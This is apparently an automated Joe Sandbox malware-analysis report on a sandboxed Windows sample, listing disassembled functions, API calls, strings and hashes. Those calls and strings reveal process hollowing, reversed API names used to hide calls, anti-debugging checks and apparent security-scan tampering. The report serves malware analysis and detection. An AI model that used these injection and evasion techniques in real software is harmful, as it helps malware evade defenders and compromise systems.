String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4083799063-51457883
Opcode ID: 36e23aec3e2034290f3169f197dd8805c8134dcf0e4cab9253220f4260ee2834
Instruction ID: a739fa68494b68729180e27db8bd6d6f415237a3fd8a7800f12e8c14729794c5
Opcode Fuzzy Hash: 36e23aec3e2034290f3169f197dd8805c8134dcf0e4cab9253220f4260ee2834
Instruction Fuzzy Hash: 3AE2FE35A50228DFDB12EB64CCD0ADE73BAAF55310F2045E1E14DABA14DE34AE4ACF51

Function 02B38BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879
Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3

Part of subcall function 02B385D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660

GetThreadContext.KERNEL32(00000900,02B81420,ScanString,02B813A4,02B3A774,UacInitialize,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,UacInitialize,02B813A4), ref: 02B3943A

Part of subcall function 02B3824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD

Part of subcall function 02B384BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521

Part of subcall function 02B379AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F

Strings

OpenSession, xrefs: 02B38BE1, 02B39004, 02B390B6, 02B3A487, 02B3A5CD
NtSetSecurityObject, xrefs: 02B3A6C7
NtReadVirtualMemory, xrefs: 02B3A458
NtOpenProcess, xrefs: 02B3A6DB
BCryptQueryProviderRegistration, xrefs: 02B3A3BF
Initialize, xrefs: 02B38F22, 02B39530, 02B396B7, 02B39AA0, 02B39D02, 02B39E72, 02B39FE5, 02B3A24A, 02B3A57B
I_QueryTagInformation, xrefs: 02B3A538
UacScan, xrefs: 02B38CAB, 02B38EC3, 02B394BF, 02B398BB, 02B39A2F, 02B3A1D9, 02B3A671
advapi32, xrefs: 02B3A53D
SLGetLicenseInformation, xrefs: 02B39197
BCryptVerifySignature, xrefs: 02B3A3AB
dbgcore, xrefs: 02B3A551, 02B3A565
ntdll, xrefs: 02B3A45D, 02B3A471, 02B3A529, 02B3A6CC, 02B3A6E0
MiniDumpReadDumpStream, xrefs: 02B3A560
UacInitialize, xrefs: 02B38E6A, 02B391CB, 02B3934A, 02B3944E, 02B3A168
MiniDumpWriteDump, xrefs: 02B3A54C
ScanString, xrefs: 02B38C3A, 02B38DE5, 02B38F93, 02B393BB, 02B395A1, 02B39728, 02B39BB5, 02B39D73, 02B39EE3, 02B3A056, 02B3A341, 02B3A3EE
NtOpenObjectAuditAlarm, xrefs: 02B3A46C, 02B3A524
bcrypt, xrefs: 02B3A3B0, 02B3A3C4, 02B3A3D8
BCryptRegisterProvider, xrefs: 02B3A3D3
sppc, xrefs: 02B391AE
ScanBuffer, xrefs: 02B38D04, 02B38D8C, 02B39127, 02B3923C, 02B392D9, 02B39612, 02B39799, 02B3992C, 02B39B11, 02B39C26, 02B39DE4, 02B39F54, 02B3A0C7, 02B3A2BB, 02B3A4D9, 02B3A61F

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2852987580-51457883
Opcode ID: 12ec2a5cf8b09d876e8e1cf9cbb6f2b4238d21fea9a8bd697a77f19f1d031681
Instruction ID: 70296f05d11a88401721e9d019b62269f8676719c0b985bc7c43bd063f6bc056
Opcode Fuzzy Hash: 12ec2a5cf8b09d876e8e1cf9cbb6f2b4238d21fea9a8bd697a77f19f1d031681
Instruction Fuzzy Hash: F5E2FE35A50228DFDB12EB64CCD0ADE73BAAF55310F2045E1E14DABA14DE34AE4ACF51

Function 02B25A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97

Strings

Software\Borland\Delphi\Locales, xrefs: 02B25AE4
Software\Borland\Locales, xrefs: 02B25AA8, 02B25AC6

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
Instruction ID: 4bd932c78b7b0ae43d0d2699d52b0914be321c09d70b45ade323b729943c388b
Opcode Fuzzy Hash: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
Instruction Fuzzy Hash: 84515371A5032C7AFB25DAA88C46FEF77AD9B04744F8001E1B64CE6181E6749A488FA5

Function 02B38798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802

Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C

Strings

BCryptVerifySignature, xrefs: 02B387BF
bcrypt, xrefs: 02B387AB

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 306977690a6c919f8d33b30bb4668b0fc36ed781fd69c50223371d65591a658c
Instruction ID: 8a5edc7cfb20edf46ff924efe6e7fdd27d4fd4135212d1152950f0671cfba796
Opcode Fuzzy Hash: 306977690a6c919f8d33b30bb4668b0fc36ed781fd69c50223371d65591a658c
Instruction Fuzzy Hash: 7CF0F671EA3324BEEB11AF6DAC44FB6379CE7823D4F0089AAB10C87540C7701826CB50

Function 02B3EBE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EBF8
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC0A
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC21

Strings

KernelBase, xrefs: 02B3EBF3
CheckRemoteDebuggerPresent, xrefs: 02B3EC04

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 9f427d319681537244f2af0cec43e8d4813bf7eb02b0f697c03f7925e479e84f
Instruction ID: 36edf0b448852898b8c0320bd71328b9f441e0f2367a0802d6d2026963a73c7c
Opcode Fuzzy Hash: 9f427d319681537244f2af0cec43e8d4813bf7eb02b0f697c03f7925e479e84f
Instruction Fuzzy Hash: 39F0A03090425CAEEB13AAAC88887DCFBA99F09328FA407D6A424B21D1E7755694C651

Function 02B3DBA8 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DBE3
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DC13
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC28
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC54
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC5D

Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 5c3dce003154bd0d2c999eaffad051ac3dfd10ce2d67b7be5626698bd90203fa
Instruction ID: 06edcd81b079114e43769282066cb6bac84a80f8c630645dead5d9726a2fcf3a
Opcode Fuzzy Hash: 5c3dce003154bd0d2c999eaffad051ac3dfd10ce2d67b7be5626698bd90203fa
Instruction Fuzzy Hash: 68210375A50319BEEB11EAE4CC46FEE77BDEB08700F5005A1B704F71C0DAB4AA048B95

Function 02B3E2F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E42E

Strings

Initialize, xrefs: 02B3E31E
ScanBuffer, xrefs: 02B3E377
OpenSession, xrefs: 02B3E3D0

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 7a797854947e8480ca93950aed7e644b1d959fdbe0f004d08d1ed689d3c99cfd
Instruction ID: cb1ff9b933552fd49c799d69fa3e744fe6fb54d56ffe49df04c925ced8d9b85f
Opcode Fuzzy Hash: 7a797854947e8480ca93950aed7e644b1d959fdbe0f004d08d1ed689d3c99cfd
Instruction Fuzzy Hash: B8412135B102189FEB02EBA4DC41ADEB3FAEF4C710F1148A6E555B7A50DA74ED098F50

Function 02B3DAC4 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: c5df92261042b6cc634f3bff3e87dcb399df58e0a4b0149838a7730d2f57b06a
Instruction ID: 905621b6259aaa7755e7909b5cc6afafbe30b01d1cc0859b74b1836ac1ea43bc
Opcode Fuzzy Hash: c5df92261042b6cc634f3bff3e87dcb399df58e0a4b0149838a7730d2f57b06a
Instruction Fuzzy Hash: 9321FF71A40319BAEB11EAE4CD42FDEB7BDEB04B00F5045A1B604F75D0D7B06F048A65

Function 02B385D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660

Strings

Kernel32, xrefs: 02B3861F
CreateProcessAsUserW, xrefs: 02B385ED

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: 3fd5adf6e5416903907565d791440ba95b4f8232fa1156fd57cedbb187cea5ae
Instruction ID: 9cc3bc0a6e313e202488f56eaee7c66dd24cbaf687a8aaff39c4c67155a6f3d7
Opcode Fuzzy Hash: 3fd5adf6e5416903907565d791440ba95b4f8232fa1156fd57cedbb187cea5ae
Instruction Fuzzy Hash: 8511D0B6650208BFEB41EEACDD81F9A37EDEB4C710F5144A0BA0CE7A40C634E9148B61

Function 02B379AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F

Strings

ntdll, xrefs: 02B379F4
yromeMlautriVetacollAwZ, xrefs: 02B379C7

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 74cf4a311dc8ea61ca004427ec013a5b89bfb2aaa586ab6fddee0c041c4fa870
Instruction ID: 06255f0686641808faaa8339eed2742932e287a1922ef921a54ccb927c6d9abd
Opcode Fuzzy Hash: 74cf4a311dc8ea61ca004427ec013a5b89bfb2aaa586ab6fddee0c041c4fa870
Instruction Fuzzy Hash: 47111E75650208BFEB01EFA4DC41E9EB7FDEB48710F5184A1F918E7A40DA30AA15DB61

Function 02B379AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F

Strings

ntdll, xrefs: 02B379F4
yromeMlautriVetacollAwZ, xrefs: 02B379C7

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: db0b7886bf4cd4e7dfa28968a1590ff0f1281a8b688c3975431a6aed9dcfed13
Instruction ID: 640fc1c9fc663f496ea03b43a532041b52c29d3713c5d231b6f8012e4c4f273e
Opcode Fuzzy Hash: db0b7886bf4cd4e7dfa28968a1590ff0f1281a8b688c3975431a6aed9dcfed13
Instruction Fuzzy Hash: D5111B75650208BFEB01EFA4DC81E9EB7BDEB48710F5184A1F918E7A40DA30AA15DB61

Function 02B3824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD

Strings

ntdll, xrefs: 02B38294
yromeMlautriVdaeRtN, xrefs: 02B38267

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 2dad35d6677cf6aef4682331e0119c060bb5267822111146ccb84450c2f33f21
